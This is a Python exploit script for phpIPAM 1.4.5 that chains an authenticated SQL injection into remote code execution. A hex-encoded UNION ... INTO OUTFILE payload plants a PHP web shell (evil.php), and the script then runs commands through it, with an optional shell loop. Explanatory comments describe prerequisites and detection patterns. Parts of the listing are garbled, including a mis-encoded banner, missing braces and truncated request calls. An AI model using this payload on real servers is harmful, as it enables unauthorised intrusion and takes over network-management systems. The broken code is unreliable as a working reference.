# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)  
# Date: 2022-04-10  
# Exploit Author: Guilherme '@behiNdyk1' Alves  
# Vendor Homepage:  
# Software Link:  
# Version: 1.4.5  
# Tested on: Linux Ubuntu 20.04.3 LTS  
#!/usr/bin/env python3  
import requests  
import argparse  
from sys import exit, argv  
from termcolor import colored  
# ASCII-art banner. It is assigned but never printed anywhere in this listing,
# and the block-drawing glyphs are mis-encoded in this copy of the file.
banner = """  
โ–ˆโ–€โ–ˆ โ–ˆโ–‘โ–ˆ โ–ˆโ–€โ–ˆ โ–ˆ โ–ˆโ–€โ–ˆ โ–„โ–€โ–ˆ โ–ˆโ–€โ–„โ–€โ–ˆ โ–„โ–ˆ โ–‘ โ–ˆโ–‘โ–ˆ โ–‘ โ–ˆโ–€ โ–ˆโ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–‘โ–‘ โ–ˆ โ–€โ–ˆโ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–€ โ–ˆโ–€โ–€  
โ–ˆโ–€โ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–€ โ–ˆ โ–ˆโ–€โ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–‘โ–€โ–‘โ–ˆ โ–‘โ–ˆ โ–„ โ–€โ–€โ–ˆ โ–„ โ–„โ–ˆ โ–„โ–ˆ โ–€โ–€โ–ˆ โ–ˆโ–„โ–„ โ–ˆ โ–‘โ–ˆโ–‘ โ–ˆโ–„โ–ˆ โ–ˆโ–€โ–„ โ–ˆโ–„โ–„ โ–ˆโ–ˆโ–„  
โ–ˆโ–„โ–„ โ–ˆโ–„โ–ˆ โ–ˆโ–„โ–„ โ–ˆโ–€โ–€ โ–ˆโ–‘โ–ˆ โ–ˆ โ–ˆโ–„โ–‘โ–ˆ โ–ˆโ–€โ–„ โ–ˆโ–„โ–ˆ โ–ˆโ–€ โ–ˆโ–€โ–€ โ–ˆโ–€โ–€  
โ–ˆโ–„โ–ˆ โ–‘โ–ˆโ–‘ โ–ˆโ–„โ–ˆ โ–ˆโ–ˆโ–„ โ–ˆโ–€โ–ˆ โ–ˆ โ–ˆโ–‘โ–€โ–ˆ โ–ˆโ–„โ–€ โ–‘โ–ˆโ–‘ โ–„โ–ˆ โ–ˆโ–ˆโ–„ โ–ˆโ–„โ–„\n"""  
# Command-line interface. ``--path`` must satisfy two conditions at once (see the
# help text and exploit()): the database server has to be able to write there,
# and the web server has to serve files from it.
parser = argparse.ArgumentParser(usage="./ -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")  
parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)  
parser.add_argument("-usr", type=str, help="Username to log in as", required=True)  
parser.add_argument("-pwd", type=str, help="User's password", required=True)  
parser.add_argument("-cmd", type=str, help="Command to execute", default="id")  
parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")  
# Parsed but never consulted: exploit() tests ``"--shell" in argv`` directly
# instead of reading ``args.shell``.
parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")  
args = parser.parse_args()  
url = args.url  
username = args.usr  
password = args.pwd  
command = args.cmd  
path = args.path  
# Validating url  
# Strips exactly one trailing slash so the f-strings below can append "/app/...".
if url.endswith("/"):  
url = url[:-1]  
# The scheme check only warns: there is no exit()/return after the message, so
# execution continues with the unusable URL (``exit`` is imported at the top of
# the file but never called in this listing).
if not url.startswith("http://") and not url.startswith("https://"):  
print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))  
def login(url, username, password):  
"""Log in to phpIPAM with the given credentials and return the value of the ``phpipam`` session cookie."""  
# Form fields expected by app/login/login_check.php.
# NOTE: the closing brace of this dict is missing in this copy of the file.
data = {  
"ipamusername": username,  
"ipampassword": password  
print(colored(f"[...] Trying to log in as {username}", "blue"))  
# HTTP request to the login checker; ``data`` goes in the request body. The
# client call in front of the URL is lost in this copy of the file.
r ="{url}/app/login/login_check.php", data=data)  
# Failure is detected only by a substring match on the HTML body; any other
# outcome (lockout page, redirect, 5xx) is reported as a successful login.
if "Invalid username or password" in r.text:  
# Echoes the plaintext password to the terminal (scrollback / session logs),
# then falls through: no return or exit here, so the cookie lookup below still
# runs and raises KeyError when the response carried no ``phpipam`` cookie.
print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))  
print(colored("[+] Login successful!", "green"))  
# The session cookie is the only credential the rest of the script carries.
return str(r.cookies['phpipam'])  
# Module-level side effect: the login request is sent as soon as the file runs
# (there is no ``if __name__ == "__main__"`` guard anywhere in this listing).
auth_cookie = login(url, username, password)  
def exploit(url, auth_cookie, path, command):  
"""Turn the authenticated SQL injection into a file write and command execution.

Posts a ``UNION ... INTO OUTFILE`` payload to the BGP mapping search page so
that the database server writes ``evil.php`` under ``path``, then fetches that
file through the web server and runs ``command`` through it.
"""  
print(colored("[...] Exploiting", "blue"))  
# Injection point. Detection: a POST to this path whose ``subnet`` field
# contains "Union Select" / "INTO OUTFILE".
vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"  
# NOTE: the closing brace of this dict is missing in this copy of the file.
data = {  
# ``subnet`` closes the original string literal with ``"``, appends a 4-column
# UNION whose 2nd column is a hex literal (it decodes to a PHP one-liner of the
# form ``<?php system($_GET[..cmd..]); ?>``), has MySQL write the row to
# ``{path}/evil.php``, and comments out the remainder of the query with ``-- -``.
# Server-side prerequisites: the DB account must hold the FILE privilege and
# MySQL's ``secure_file_priv`` must allow writing into ``path`` -- hence the
# "path isn't writable" failure message below.
# The 0x20 1c / 20 18 / 20 19 / 20 1d byte pairs inside the hex look like
# Unicode quote code points leaked in by copy/paste, so when hunting, match on
# the ``INTO OUTFILE`` pattern rather than on this exact literal.
"subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",  
"bgp_id": "1"  
# Only the session cookie from login() is sent; no CSRF token is involved.
cookies = {  
"phpipam": auth_cookie  
# The request that delivers ``data`` is mangled in this copy of the file: the
# client call in front of the URL is missing and the brace closes ``cookies``.
}"{url}/{vulnerable_path}", data=data, cookies=cookies)  
# Sanity check that the dropped file is reachable through the web server.
test = requests.get(f"{url}/evil.php")  
# Any non-200 response (403, redirect, ...) is treated as failure;
# ``return print(...)`` makes the function return None in that case.
if test.status_code != 200:  
return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))  
# Inspects sys.argv directly; the parsed ``args.shell`` option is never read.
if "--shell" in argv:  
# Infinite prompt loop with no exit command. Each response ``r`` is fetched but
# never printed, so this mode displays no output as written, and the
# single-command branch below is never reached from it.
while True:  
command = input("Shell> ")  
r = requests.get(f"{url}/evil.php?cmd={command}")  
# Single-command mode: ``command`` (CLI default "id") is passed through the
# ``cmd`` query parameter. Artifacts left behind on the target: evil.php under
# ``path`` (the script never removes it) and web-server log entries for
# /evil.php?cmd=... .
print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))  
r = requests.get(f"{url}/evil.php?cmd={command}")  
print(f"\n\n[+] Output:\n{r.text}")  
# Module-level call: the whole chain (login above, then this) runs on import or
# execution, with no ``if __name__ == "__main__"`` guard.
exploit(url, auth_cookie, path, command)